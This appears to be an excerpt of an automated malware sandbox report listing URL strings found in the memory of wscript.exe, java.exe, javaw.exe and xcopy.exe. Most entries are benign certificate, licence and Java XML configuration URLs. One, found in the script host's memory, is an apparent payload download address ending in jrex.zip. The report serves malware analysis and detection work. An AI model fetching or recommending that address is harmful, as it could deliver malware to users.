Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009F78000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A579000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://opensource.org/licenses/bsd-license.php
Source: wscript.exe, 00000005.00000003.1667383984.0000000006E96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1656110679.0000000006E9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1661002252.0000000006894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1665048799.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.1676383975.00000000005F3000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zip
Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1745013590.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/
Source: xcopy.exe, 00000015.00000003.1745226975.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1745013590.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ibm.com.
Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.lotus.com.
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: xcopy.exe, 00000015.00000003.1743343151.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/goto/opensourcecode/request
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/a/lang$
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimitK
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit(L
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo:
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthche/xerC
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimitutil/7
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit;E
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimitJ
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit;T
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitb
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sun.com.
Source: xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.torchmobile.com/
Source: xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.torchmobile.com/)
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.unicode.org/copyright.html
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD=
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/eam;
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entitiesex
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesna(
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesrn(
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces
Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces&
